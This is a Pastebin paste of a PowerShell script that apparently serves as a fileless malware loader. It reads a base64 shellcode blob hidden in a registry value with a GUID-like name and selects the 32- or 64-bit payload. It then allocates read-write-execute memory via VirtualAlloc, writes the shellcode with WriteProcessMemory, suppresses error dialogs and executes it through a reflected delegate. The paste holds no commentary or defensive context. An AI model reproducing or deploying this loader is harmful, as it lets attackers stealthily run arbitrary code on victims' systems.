Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $regpath = "HKLM:\Software\Microsoft\Windows\CurrentVersion\Shell";
- $regkey = "{4FF23B38-C5A1-5CBE-F25D458E1F8C5642}";
- function Get-DelegateType
- {
- Param
- (
- [OutputType([Type])]
- [Parameter( Position = 0)]
- [Type[]]
- $Parameters = (New-Object Type[](0)),
- [Parameter( Position = 1 )]
- [Type]
- $ReturnType = [Void]
- )
- $Domain = [AppDomain]::CurrentDomain
- $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
- $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
- $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
- $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
- $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
- $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
- $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
- $MethodBuilder.SetImplementationFlags('Runtime, Managed')
- Write-Output $TypeBuilder.CreateType()
- }
- function bytesToIntegerBI($byteArrayInput, $offset) {
- $returnedInt = $byteArrayInput[$offset+0] * 16777216;
- $returnedInt += $byteArrayInput[$offset+1] * 65536;
- $returnedInt += $byteArrayInput[$offset+2] * 256;
- $returnedInt += $byteArrayInput[$offset+3] * 1;
- return $returnedInt;
- }
- $externalFuncs = @"
- [DllImport("kernel32.dll")]
- public static extern IntPtr GetCurrentProcess();
- [DllImport("kernel32.dll")]
- public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
- [DllImport("kernel32.dll")]
- public static extern bool WriteProcessMemory(IntPtr process, IntPtr address, byte[] buffer, uint size, uint written);
- [DllImport("kernel32.dll")]
- public static extern uint SetErrorMode(uint uMode);
- "@
- $cFuncsCallable = Add-Type -memberDefinition $externalFuncs -Name "Win32" -namespace Win32Functions -passthru;
- function shellExec($lExternalFuncs, $funcOffset, $fullShellcode) {
- $curProcess = $cFuncsCallable::GetCurrentProcess();
- $rwxPage1 = $cFuncsCallable::VirtualAlloc(0,$lExternalFuncs.Length,0x00003000,0x40);
- $rwxPage2 = $cFuncsCallable::VirtualAlloc(0,$fullShellcode.Length,0x00003000,0x40);
- $cFuncsCallable::WriteProcessMemory($curProcess, $rwxPage1, $lExternalFuncs, $lExternalFuncs.Length, 0) | Out-Null;
- $cFuncsCallable::WriteProcessMemory($curProcess, $rwxPage2, $fullShellcode, $fullShellcode.Length, 0) | Out-Null;
- $funcHndl = [IntPtr]($rwxPage1.ToInt64()+$funcOffset);
- $funcDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([Void]);
- $scFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($funcHndl, $funcDelegate);
- $cFuncsCallable::SetErrorMode(0x8006) | Out-Null;
- $scFunc.Invoke($rwxPage2, $rwxPage1);
- }
- function processShellcode($shellcodeEnc, $mode64or32) {
- $length = bytesToIntegerBI $shellcodeEnc 1;
- $index = 5;
- while ($index+8 -lt $length) {
- $byte = $shellcodeEnc[$index];
- $int1 = bytesToIntegerBI $shellcodeEnc ($index+1);
- $funcOffset = bytesToIntegerBI $shellcodeEnc ($index+5);
- $index += 9;
- if ($byte -eq $mode64or32) {
- shellExec $shellcodeEnc[$index..($index+$int1)] $funcOffset $shellcodeEnc;
- break;
- } else {
- $index += $int1;
- }
- }
- }
- $base64shellcode = (Get-ItemProperty -Path "$regpath" -Name "$regkey").$regkey;
- $shellcodeEnc = [System.Convert]::FromBase64String($base64shellcode);
- $shellcodeEnc[0] = 0;
- if ([IntPtr]::Size -eq 8) {
- processShellcode $shellcodeEnc 2;
- } else {
- processShellcode $shellcodeEnc 1;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement